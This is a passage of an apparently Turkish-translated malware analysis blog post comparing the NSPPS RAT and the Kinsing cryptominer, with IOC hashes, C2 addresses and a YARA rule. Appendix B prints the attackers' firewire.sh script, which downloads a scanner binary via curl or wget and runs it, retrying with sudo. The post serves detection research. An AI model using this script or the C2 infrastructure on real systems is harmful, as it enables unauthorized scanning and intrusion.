g\u00f6r\u00fclen\u00a0ayn\u0131\u00a0<span class=\"cyb-inline-code-labs\">WriteFile -&gt; runcmd -&gt; newobject dizisini i\u00e7erir:<\/span><\/p>\n<p><img decoding=\"async\" class=\"alignnone size-large wp-image-8773\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-12-1024x113.png\" alt=\"\" width=\"1024\" height=\"113\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-12-1024x113.png 1024w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-12-300x33.png 300w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-12-768x84.png 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-12-1536x169.png 1536w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-12.png 2018w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p>Ara\u015ft\u0131rmam\u0131za g\u00f6re firewire.sh beti\u011fi kamuya a\u00e7\u0131k olarak kullan\u0131ma sunulmam\u0131\u015f ve A\u00e7\u0131k Kaynakl\u0131 bir ara\u00e7 olarak sunulmam\u0131\u015ft\u0131r, bu nedenle bu kan\u0131t par\u00e7as\u0131n\u0131n sadece bir tesad\u00fcf olmad\u0131\u011f\u0131na inan\u0131yoruz. Bu, iki k\u00f6t\u00fc ama\u00e7l\u0131 yaz\u0131l\u0131m\u0131n yazarlar\u0131 aras\u0131nda bir ba\u011flant\u0131 oldu\u011fu veya en az\u0131ndan kaynaklar\u0131n\u0131 payla\u015ft\u0131klar\u0131 anlam\u0131na gelir.<\/p>\n<p><strong><em>Kod Yap\u0131s\u0131<\/em><\/strong><\/p>\n<p>NSPPS&#8217;yi analiz ederken, \u00e7ok basit bir kod yap\u0131s\u0131na sahip oldu\u011fu dikkat \u00e7ekicidir. Kodun ba\u015f\u0131nda, NSPPS \u00fc\u00e7 ba\u015flatma i\u015flevini \u00e7a\u011f\u0131r\u0131r, ard\u0131ndan sonsuza kadar \u00e7al\u0131\u015fan bir while d\u00f6ng\u00fcs\u00fcne girer. D\u00f6ng\u00fc,\u00a0C2 sunucusundan bir g\u00f6rev (\u00a0<span class=\"cyb-inline-code-labs\">getTask() ) al\u0131r ve onu y\u00fcr\u00fct\u00fcr (\u00a0<\/span><span class=\"cyb-inline-code-labs\">doTask()<\/span>\u00a0).\u00a0<span class=\"cyb-inline-code-labs\">doTask<\/span>\u00a0i\u015flevi i\u00e7inde, k\u00f6t\u00fc ama\u00e7l\u0131 yaz\u0131l\u0131m ald\u0131\u011f\u0131 dizeyi kontrol eder, ard\u0131ndan al\u0131nan g\u00f6revi ger\u00e7ekle\u015ftirmek i\u00e7in do\u011fru i\u015flevi se\u00e7er.<\/p>\n<p>\u015ea\u015f\u0131rt\u0131c\u0131 bir \u015fekilde, Kinsing&#8217;i analiz etti\u011fimizde, birka\u00e7 k\u00fc\u00e7\u00fck de\u011fi\u015fiklik d\u0131\u015f\u0131nda ayn\u0131 yap\u0131ya sahip oldu\u011funu g\u00f6rd\u00fck. Ana de\u011fi\u015fiklik, kripto madencili\u011finden sorumlu olan ek bir ba\u015flatma i\u015flevidir. D\u00f6ng\u00fcn\u00fcn i\u00e7indeki i\u00e7 i\u015flevlerde de baz\u0131 k\u00fc\u00e7\u00fck de\u011fi\u015fiklikler vard\u0131r.<\/p>\n<p>Bir g\u00f6steri i\u00e7in a\u015fa\u011f\u0131daki kod par\u00e7ac\u0131klar\u0131na bak\u0131n:<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Kinsing&#8217;in farkl\u0131 \u00f6rnekleri aras\u0131nda da farkl\u0131l\u0131klar vard\u0131r. \u00d6rne\u011fin, hepsinde &#8220;redis_brute&#8221; i\u015flevselli\u011fi yoktur ve baz\u0131lar\u0131nda \u00e7ok daha az i\u015flev vard\u0131r.<\/p>\n<p>Az \u00f6nce tan\u0131mlad\u0131\u011f\u0131m\u0131z ortak yap\u0131ya bakt\u0131\u011f\u0131m\u0131zda, iki aile aras\u0131ndaki ili\u015fkinin art\u0131k bir tesad\u00fcf veya rastgele bir taklit gibi g\u00f6r\u00fcnmedi\u011fini, daha \u00e7ok yazarlar aras\u0131ndaki bir i\u015fbirli\u011fi, hatta ayn\u0131 kodun tekrar kullan\u0131m\u0131 gibi g\u00f6r\u00fcnd\u00fc\u011f\u00fcn\u00fc d\u00fc\u015f\u00fcn\u00fcyoruz.<\/p>\n<p><strong><em>\u015eifreleme, \u015eifreleme, \u015eifreleme<\/em><\/strong><\/p>\n<p>NSPPS \u00f6rne\u011fi i\u00e7in yapt\u0131klar\u0131 analizde\u00a0IronNet\u00a0, NSPPS taraf\u0131ndan kullan\u0131lan bir RC4 anahtar\u0131n\u0131 arayan bir YARA kural\u0131 ekledi. Bu YARA&#8217;y\u0131 kullanarak ve bu belirli RC4 anahtar\u0131n\u0131 arayarak, i\u00e7indeki t\u00fcm Kinsing \u00f6rneklerini ve NSPPS \u00f6rne\u011fini bulduk:<img decoding=\"async\" class=\"alignnone size-large wp-image-8774\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-13-1024x65.png\" alt=\"\" width=\"1024\" height=\"65\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-13-1024x65.png 1024w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-13-300x19.png 300w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-13-768x49.png 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-13-1536x98.png 1536w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-13.png 1814w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p><em>\u015eekil N. 14: Kinsing RC4 anahtar\u0131<\/em><\/p>\n<p><img decoding=\"async\" class=\"alignnone size-large wp-image-8775\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-14-1024x69.png\" alt=\"\" width=\"1024\" height=\"69\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-14-1024x69.png 1024w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-14-300x20.png 300w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-14-768x52.png 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-14-1536x104.png 1536w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-14.png 1806w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p>Bu anahtar\u0131n XRef&#8217;lerini kontrol ederek kullan\u0131m\u0131n\u0131 buldu\u011fumuzda, her iki k\u00f6t\u00fc ama\u00e7l\u0131 yaz\u0131l\u0131m ailesinde de neredeyse ayn\u0131 i\u015flevler arac\u0131l\u0131\u011f\u0131yla kullan\u0131ld\u0131\u011f\u0131n\u0131 g\u00f6rebiliriz.<\/p>\n<p>NSPPS i\u00e7in kullan\u0131m:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-full wp-image-8776\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-15.webp\" alt=\"\" width=\"768\" height=\"217\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-15.webp 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-15-300x85.webp 300w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><\/p>\n<p>Kinsing&#8217;in Kullan\u0131m\u0131:<\/p>\n<p><img decoding=\"async\" class=\"alignnone size-full wp-image-8777\" src=\"https:\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-16.png\" alt=\"\" width=\"768\" height=\"236\" title=\"\" srcset=\"\/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-16.png 768w, \/\/sunucucozumleri.com\/blog\/wp-content\/uploads\/2024\/12\/Kinsing-16-300x92.png 300w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><\/p>\n<p>Tek fark , yaln\u0131zca Kinsing \u00f6rneklerinde bulunan\u00a0<span class=\"cyb-inline-code-labs\">getMinerPid<\/span>\u00a0fonksiyonudur , \u00e7\u00fcnk\u00fc NSPPS ayn\u0131 kripto madencili\u011fi i\u015flevselli\u011fine sahip de\u011fildir.<\/p>\n<p><span class=\"cyb-inline-code-labs\">Her iki k\u00f6t\u00fc ama\u00e7l\u0131 yaz\u0131l\u0131mda da RC4 \u015fifrelemesini uygulayan main.RC4<\/span>\u00a0i\u015flevine bakt\u0131\u011f\u0131m\u0131zda\u00a0, iki uygulaman\u0131n da pratik olarak ayn\u0131 oldu\u011funu g\u00f6r\u00fcyoruz. A\u015fa\u011f\u0131daki kar\u015f\u0131la\u015ft\u0131rmaya bak\u0131n:<\/p>\n<p><strong><em>Fonksiyon Adlar\u0131<\/em><\/strong><\/p>\n<p>T\u00fcm bunlardan sonra g\u00f6sterece\u011fimiz son \u015fey, bu \u00f6rneklerin fonksiyon listesidir.<\/p>\n<p>Golang ikili dosyalar\u0131, kaynak kod sembollerini koruma \u00f6zelli\u011fine sahiptir ve bu, orijinal i\u015flev adlar\u0131n\u0131n t\u00fcm listesini kullan\u0131labilir hale getirerek bizim durumumuzda i\u015fe yarar. \u0130kili dosyalarda kullan\u0131lan ve kendi i\u015flevlerini i\u00e7eren paketleri zaten tart\u0131\u015ft\u0131k, bu y\u00fczden \u015fimdi k\u00f6t\u00fc ama\u00e7l\u0131 yaz\u0131l\u0131m yazar\u0131 taraf\u0131ndan yaz\u0131lm\u0131\u015f i\u015flevlerle ilgileniyoruz. Bu i\u015flevler\u00a0<span class=\"cyb-inline-code-labs\">main<\/span>\u00a0\u00f6nekiyle tan\u0131mlan\u0131r ve bunlar bir sonraki kar\u015f\u0131la\u015ft\u0131rmada kullan\u0131lanlard\u0131r.<\/p>\n<p>NSPPS\u2019nin 63 adet fonksiyonu bulunmaktad\u0131r.<\/p>\n<p>Kinsing \u00f6rnekleri birbirinden biraz farkl\u0131d\u0131r. Daha \u00f6nce yay\u0131nlanm\u0131\u015f rastgele bir Kinsing \u00f6rne\u011fini kar\u015f\u0131la\u015ft\u0131ral\u0131m: b70d14a7c069c2a88a8a55a6a2088aea184f84c0e110678e6a4afa2eb377649f. Bu \u00f6rnekte yaln\u0131zca 59 i\u015flev vard\u0131r (\u00a0her iki \u00f6rnek i\u00e7in de i\u015flevlerin tam listesi i\u00e7in\u00a0<span class=\"cyb-inline-code-labs\"><strong>Ek C&#8217;ye bak\u0131n).<\/strong><\/span><\/p>\n<p>Her iki \u00f6rnekte de ortak 51 i\u015flev ad\u0131 vard\u0131r ve bu da i\u015flevlerin %83&#8217;\u00fcn\u00fc temsil eder. Kinsing&#8217;in sekiz benzersiz i\u015flev ad\u0131 ve NSPPS&#8217;in 12 benzersiz i\u015flev ad\u0131 vard\u0131r. Kinsing&#8217;in benzersiz i\u015flevleri kripto madencili\u011fiyle ilgiliyken NSPPS&#8217;in benzersiz i\u015flevleri \u00e7o\u011funlukla RAT ile ilgilidir. Bundan, kodun b\u00fcy\u00fck bir b\u00f6l\u00fcm\u00fcn\u00fcn ayn\u0131 \u015fekilde adland\u0131r\u0131ld\u0131\u011f\u0131n\u0131 \u00f6\u011freniyoruz; bu da her iki \u00f6rne\u011fi de ayn\u0131 yazar\u0131n yazd\u0131\u011f\u0131 veya yazarlardan birinin di\u011ferinden kopyalad\u0131\u011f\u0131 anlam\u0131na geliyor.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Cozum\"><\/span><strong>\u00c7\u00f6z\u00fcm<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>Hem NSPPS&#8217;yi hem de Kinsing&#8217;i sunduk ve aralar\u0131ndaki farklar\u0131 tart\u0131\u015ft\u0131k: Golang s\u00fcr\u00fcmleri, paketler, Hamlet oyun beti\u011fi ve kripto madencili\u011fi faaliyeti. Ayr\u0131ca iki ailenin benzerliklerini de sunduk: Firewire.sh adl\u0131 Masscan beti\u011fi, payla\u015f\u0131lan kod yap\u0131s\u0131, RC4 anahtar\u0131 ve i\u015flev adlar\u0131.<\/p>\n<p>Yukar\u0131dakilerin hepsi her iki k\u00f6t\u00fc ama\u00e7l\u0131 yaz\u0131l\u0131m\u0131n da ayn\u0131 aileyi temsil etti\u011fini g\u00f6steriyor. \u0130lk s\u00fcr\u00fcm\u00fcn Kas\u0131m 2019&#8217;dan \u00f6nce derlendi\u011fine, NSPPS olarak adland\u0131r\u0131ld\u0131\u011f\u0131na ve RAT olarak kullan\u0131ld\u0131\u011f\u0131na inan\u0131yoruz. Daha sonra k\u00f6t\u00fc ama\u00e7l\u0131 yaz\u0131l\u0131m baz\u0131 yeni paketlerle (markbates\\pkger gibi), yeni i\u015flevlerle (cryptomining yetenekleri), yeni Shakespeare ilham\u0131yla g\u00fcncellendi ve di\u011fer g\u00fcvenlik \u015firketleri taraf\u0131ndan Kinsing olarak adland\u0131r\u0131ld\u0131.<\/p>\n<p>Zararl\u0131 yaz\u0131l\u0131m\u0131n kullan\u0131m amac\u0131 ve kullan\u0131m\u0131 de\u011fi\u015fse de ara\u015ft\u0131rmac\u0131lar olarak, eski s\u00fcr\u00fcmlerden edindi\u011fimiz bilgileri kullanarak analiz ve tespiti \u00e7ok daha kolay ve h\u0131zl\u0131 hale getirebildi\u011fimizden, zararl\u0131 yaz\u0131l\u0131mlar aras\u0131ndaki benzerliklerden h\u00e2l\u00e2 faydalanabiliyoruz.<\/p>\n<p><em><strong>VirusTotal \u00dczerinden Tespit Hakk\u0131nda Bir Not<\/strong><\/em><\/p>\n<p>Kinsing eserlerinden baz\u0131lar\u0131n\u0131 imzalarken ve yeni \u00f6rnekler ararken, Kinsing&#8217;in kodunun bir k\u0131sm\u0131n\u0131 a\u00e7\u0131k\u00e7a i\u00e7eren ancak y\u00fcr\u00fct\u00fclebilir dosyalar olarak hasar g\u00f6rm\u00fc\u015f ve d\u00fczg\u00fcn ELF olarak \u00e7al\u0131\u015ft\u0131r\u0131lamayan birka\u00e7 d\u00fczine dosya bulduk. Daha detayl\u0131 inceleme, bu dosyalar\u0131n yaln\u0131zca ba\u015fka bir \u00f6rne\u011fin bir par\u00e7as\u0131 oldu\u011funu, yani birinin \u00f6rne\u011fi kesip VirusTotal&#8217;a y\u00fckledi\u011fini anlamam\u0131za yard\u0131mc\u0131 oldu. \u00d6rne\u011fin, d247687e9bdb8c4189ac54d10efd29aee12ca2af78b94a693113f382619a175b \u00f6rne\u011fi, 16,87 MB uzunlu\u011funda bilinen bir Kinsing \u00f6rne\u011fidir ve 19 Haziran 2020&#8217;de VirusTotal&#8217;e y\u00fcklenen a51a4398dd7f11e34ea4d896cde4e7b0537351f82c580f5ec951a8e7ea017865 dosyas\u0131, baz\u0131 AV sat\u0131c\u0131lar\u0131 taraf\u0131ndan Kinsing olarak tespit edilmi\u015ftir, ancak asl\u0131nda son \u00f6rne\u011fin yaln\u0131zca ilk 4,84 MB&#8217;\u0131d\u0131r.<\/p>\n<p>Bu k\u0131smi \u00f6rnekler, k\u00f6t\u00fc ama\u00e7l\u0131 yaz\u0131l\u0131m\u0131n farkl\u0131 b\u00f6l\u00fcmlerini AV motorlar\u0131na kar\u015f\u0131 test etmeye \u00e7al\u0131\u015fan bir sald\u0131rgan veya kodun b\u00f6l\u00fcmlerini inceleyen bir g\u00fcvenlik ara\u015ft\u0131rmac\u0131s\u0131 olabilir. Bu nedenle, yaln\u0131zca uygun ELF&#8217;leri tespit etmek i\u00e7in, yaln\u0131zca b\u00f6l\u00fcm ba\u015fl\u0131k boyutlar\u0131n\u0131n toplam\u0131n\u0131n t\u00fcm dosyan\u0131n boyutuyla e\u015fle\u015fti\u011fi dosyalar\u0131 e\u015fle\u015ftirmek i\u00e7in bir ko\u015ful eklenmelidir (a\u015fa\u011f\u0131daki YARA kural\u0131na bak\u0131n).<\/p>\n<p><strong>Ek A: IOC&#8217;ler ve YARA<\/strong><\/p>\n<p><strong>IOCs:<\/strong><\/p>\n<table class=\"table table-bordered table-striped table-responsive-stack\" width=\"100%\">\n<thead>\n<tr>\n<th width=\"80%\">Indicator<\/th>\n<th width=\"20%\">Type<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>0b0aa978c061628ec7cd611edeec3373d4742cbda533b07a2b3eb84a9dd2cb8a<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>0c811140be9f59d69da925a4e15eb630352fa8ad4f931730aec9ae80a624d584<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>2132d7bed60fda38adda28efdbbd2df2c9379fed5de2e68fc6801f5621b596b0<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>4b0138c12e3209d8f9250c591fcc825ee6bff5f57f87ed9c661df6d14500e993<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>4f4e69abb2e155a712df9b3d0387f9fb2d6db8f3a2c88d7bbe199251ec08683f<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>5059d67cd24eb4b0b4a174a072ceac6a47e14c3302da2c6581f81c39d8a076c6<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>511de8dd7f3cb4c5d88cd5a62150e6826cb2f825fa60607a201a8542524442e2<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>554c233d0e034b8bb3560b010f99f70598f0e419e77b9ce39d5df0dd3bc25728<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>655ee9ddd6956af8c040f3dce6b6c845680a621e463450b22d31c3a0907727e4<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>6814d22be80e1475e47e8103b11a0ec0daa3a9fdd5caa3a0558d13dc16c143d9<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>681f88d79c3ecab8683b39f8107b29258deb2d58fcea7b0c008bab76e18aa607<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>6e8c96f9e9a886fd6c51cce7f6c50d1368ca5b48a398cc1fedc63c1de1576c1e<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>7727a0b47b7fd56275fa3c1c4468db7fa201c788d1e56597c87deaff45aad634<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>7f9f8209dc619d686b32d408fed0beb3a802aa600ddceb5c8d2a9555cdb3b5e0<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>8c9b621ba8911350253efc15ab3c761b06f70f503096279f2a173c006a393ee1<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>98d3fd460e56eff5182d5abe2f1cd7f042ea24105d0e25ea5ec78fedc25bac7c<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>9fbb49edad10ad9d096b548e801c39c47b74190e8745f680d3e3bcd9b456aafc<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>a0363f3caad5feb8fc5c43e589117b8053cbf5bc82fc0034346ea3e3984e37e8<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>a5b010a5dd29d2f68ac9d5463eb8a29195f40f5103e1cc3353be2e9da6859dc6<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>b44dae9d1ce0ebec7a40e9aa49ac01e2c775fa9e354477a45b723c090b5a28f2<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>b70d14a7c069c2a88a8a55a6a2088aea184f84c0e110678e6a4afa2eb377649f<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>c44b63b1b53cbd9852c71de84ce8ad75f623935f235484547e9d94a7bdf8aa76<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>c9932ca45e952668238960dbba7f01ce699357bedc594495c0ace512706dd0ac<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>ccfda7239b2ac474e42ad324519f805171e7c69d37ad29265c0a8ba54096033d<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>d247687e9bdb8c4189ac54d10efd29aee12ca2af78b94a693113f382619a175b<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>db3b9622c81528ef2e7dbefb4e8e9c8c046b21ce2b021324739a195c966ae0b7<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>f2e7244e2a7d6b28b1040259855aeac956e56228c41808bccb8e37d87c164570<\/td>\n<td>Sha256<\/td>\n<\/tr>\n<tr>\n<td>104.248.3.165<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>139.99.50.255<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>185.61.7.8<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>188.120.254.224<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>193.33.87.220<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>195.123.220.193<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>45.10.88.102<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>46.229.215.164<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>46.243.253.167<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>47.65.90.240<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>62.113.112.127<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>67.205.161.58<\/td>\n<td>C2<\/td>\n<\/tr>\n<tr>\n<td>91.215.169.111<\/td>\n<td>C2<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><strong>YARA:<\/strong><\/p>\n<blockquote><p>import &#8220;elf&#8221;<\/p>\n<p>rule Kinsing_Malware<br \/>\n{<br \/>\nmeta:<br \/>\nauthor = &#8220;Aluma Lavi, CyberArk&#8221;<br \/>\ndate = &#8220;22-01-2021&#8221;<br \/>\nversion = &#8220;1.0&#8221;<br \/>\nhash = &#8220;d247687e9bdb8c4189ac54d10efd29aee12ca2af78b94a693113f382619a175b&#8221;<br \/>\ndescription = &#8220;Kinsing\/NSPPS malware&#8221;<br \/>\nstrings:<br \/>\n$rc4_key = { 37 36 34 31 35 33 34 34 36 62 36 31 }<br \/>\n$firewire = &#8220;.\/firewire -iL $INPUT &#8211;rate $RATE -p$PORT -oL $OUTPUT&#8221;<br \/>\n$packa1 = &#8220;google\/btree&#8221; ascii wide<br \/>\n$packa2 = &#8220;kardianos\/osext&#8221; ascii wide<br \/>\n$packa3 = &#8220;kelseyhightower\/envconfig&#8221; ascii wide<br \/>\n$packa4 = &#8220;markbates\/pkger&#8221; ascii wide<br \/>\n$packa5 = &#8220;nu7hatch\/gouuid&#8221; ascii wide<br \/>\n$packa6 = &#8220;paulbellamy\/ratecounter&#8221; ascii wide<br \/>\n$packa7 = &#8220;peterbourgon\/diskv&#8221; ascii wide<br \/>\n$func1 = &#8220;main.RC4&#8221; ascii wide<br \/>\n$func2 = &#8220;main.runTaskWithScan&#8221; ascii wide<br \/>\n$func3 = &#8220;main.backconnect&#8221; ascii wide<br \/>\n$func4 = &#8220;main.downloadAndExecute&#8221; ascii wide<br \/>\n$func5 = &#8220;main.startCmd&#8221; ascii wide<br \/>\n$func6 = &#8220;main.execTaskOut&#8221; ascii wide<br \/>\n$func7 = &#8220;main.minerRunningCheck&#8221; ascii wide<br \/>\ncondition:<br \/>\n(uint16(0) == 0x457F<br \/>\nand not (elf.sections[0].size + elf.sections[1].size + elf.sections[2].size + elf.sections[3].size + elf.sections[4].size + elf.sections[5].size + elf.sections[6].size + elf.sections[7].size &gt; filesize))<br \/>\nand ($rc4_key<br \/>\nor $firewire<br \/>\nor all of ($packa*)<br \/>\nor 4 of ($func*)<br \/>\n)<br \/>\n}<\/p><\/blockquote>\n<p><strong>Appendix B: Firewire.sh Script<\/strong><\/p>\n<blockquote><p>#!\/bin\/sh<br \/>\nPORT=$1<br \/>\nRATE=$2<br \/>\nINPUT=$3<br \/>\nOUTPUT=$4<br \/>\nMASSCAN=$5<\/p>\n<p>cat \/etc\/os-release | grep -vw grep | grep &#8220;rhel&#8221; &gt;\/dev\/null<br \/>\nif [ $? -eq 0 ]<br \/>\nthen<br \/>\nrpm -qa | grep libpcap-dev &gt; \/dev\/null<br \/>\nif [[ $? -eq 0 ]]; then<br \/>\necho &#8220;Package is installed rhel!&#8221;<br \/>\nelse<br \/>\necho &#8220;Package is NOT installed rhel!&#8221;<br \/>\nyum -y update<br \/>\nyum -y install libpcap-devel<br \/>\nfi<br \/>\nelse<br \/>\nif [ $(dpkg-query -W -f=&#8217;${Status}&#8217; libpcap-dev 2&gt;\/dev\/null | grep -c &#8220;ok installed&#8221;) -eq 0 ];<br \/>\nthen<br \/>\necho &#8220;Package is NOT installed deb!&#8221;<br \/>\napt-get update<br \/>\napt-get install -y libpcap-dev<br \/>\nelse<br \/>\necho &#8220;Package is installed deb!&#8221;<br \/>\nfi<br \/>\nfi<\/p>\n<p>if [ -x &#8220;$(command -v md5sum)&#8221; ]; then<br \/>\nsum=$(md5sum firewire | awk &#8216;{ print $1 }&#8217;)<br \/>\necho $sum<br \/>\ncase $sum in<br \/>\n45a7ef83238f5244738bb5e7e3dd6299)<br \/>\necho &#8220;firewire OK&#8221;<br \/>\n;;<br \/>\n*)<br \/>\necho &#8220;firewire wrong&#8221;<br \/>\n(curl -o firewire $MASSCAN || wget -O firewire $MASSCAN)<br \/>\n;;<br \/>\nesac<br \/>\nelse<br \/>\necho &#8220;No md5sum&#8221;<br \/>\n(curl -o firewire $MASSCAN || wget -O firewire $MASSCAN)<br \/>\nfi<\/p>\n<p>chmod +x firewire<\/p>\n<p>.\/firewire -iL $INPUT &#8211;rate $RATE -p$PORT -oL $OUTPUT 2&gt;\/dev\/null<br \/>\nif [ $? -eq 0 ]<br \/>\nthen<br \/>\necho &#8220;success&#8221;<br \/>\nelse<br \/>\necho &#8220;fail&#8221;<br \/>\nsudo .\/firewire -iL $INPUT &#8211;rate $RATE -p$PORT -oL $OUTPUT 2&gt;\/dev\/null<br \/>\nif [ $? -eq 0 ]<br \/>\nthen<br \/>\necho &#8220;success2&#8221;<br \/>\nelse<br \/>\necho &#8220;fail2&#8221;<br \/>\nfi<br \/>\nfi<\/p><\/blockquote>\n<p><strong>Appendix C: NSPPS &amp; Kinsing Function list<\/strong><\/p>\n<table class=\"table table-bordered table-striped table-responsive-stack\" width=\"100%\">\n<thead>\n<tr>\n<th width=\"50%\">NSPPS<\/th>\n<th width=\"50%\">Kinsing<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>DownloadFile<\/td>\n<td>DownloadFile<\/td>\n<\/tr>\n<tr>\n<td>ExecOutput<\/td>\n<td>ExecOutput<\/td>\n<\/tr>\n<tr>\n<td>Hosts<\/td>\n<td>Hosts<\/td>\n<\/tr>\n<tr>\n<td><\/td>\n<td>Pid<\/td>\n<\/tr>\n<tr>\n<td>RC4<\/td>\n<td>RC4<\/td>\n<\/tr>\n<tr>\n<td>RandStringRunes<\/td>\n<td>RandStringRunes<\/td>\n<\/tr>\n<tr>\n<td>Result<\/td>\n<td>Result<\/td>\n<\/tr>\n<tr>\n<td>SetSocks<\/td>\n<td>SetSocks<\/td>\n<\/tr>\n<tr>\n<td>Specification<\/td>\n<td>Specification<\/td>\n<\/tr>\n<tr>\n<td>TargetsWrapper<\/td>\n<td>TargetsWrapper<\/td>\n<\/tr>\n<tr>\n<td>Task<\/td>\n<td>Task<\/td>\n<\/tr>\n<tr>\n<td>TaskPair<\/td>\n<td>TaskPair<\/td>\n<\/tr>\n<tr>\n<td>addResult<\/td>\n<td>addResult<\/td>\n<\/tr>\n<tr>\n<td>backconnect<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>checkHealth<\/td>\n<td>checkHealth<\/td>\n<\/tr>\n<tr>\n<td>connectForSocks<\/td>\n<td>connectForSocks<\/td>\n<\/tr>\n<tr>\n<td>contains<\/td>\n<td>contains<\/td>\n<\/tr>\n<tr>\n<td><\/td>\n<td>copyFileContents<\/td>\n<\/tr>\n<tr>\n<td>doRequestWithTooManyOpenFiles<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>doTask<\/td>\n<td>doTask<\/td>\n<\/tr>\n<tr>\n<td>downloadAndExecute<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>encStruct<\/td>\n<td>encStruct<\/td>\n<\/tr>\n<tr>\n<td>execTask<\/td>\n<td>execTask<\/td>\n<\/tr>\n<tr>\n<td>execTaskOut<\/td>\n<td>execTaskOut<\/td>\n<\/tr>\n<tr>\n<td>getActiveC2CUrl<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td><\/td>\n<td>getMinerPid<\/td>\n<\/tr>\n<tr>\n<td>getOrCreateListForTaskResult<\/td>\n<td>getOrCreateListForTaskResult<\/td>\n<\/tr>\n<tr>\n<td>getOrCreateRateCounterForTask<\/td>\n<td>getOrCreateRateCounterForTask<\/td>\n<\/tr>\n<tr>\n<td>getOrCreateUuid<\/td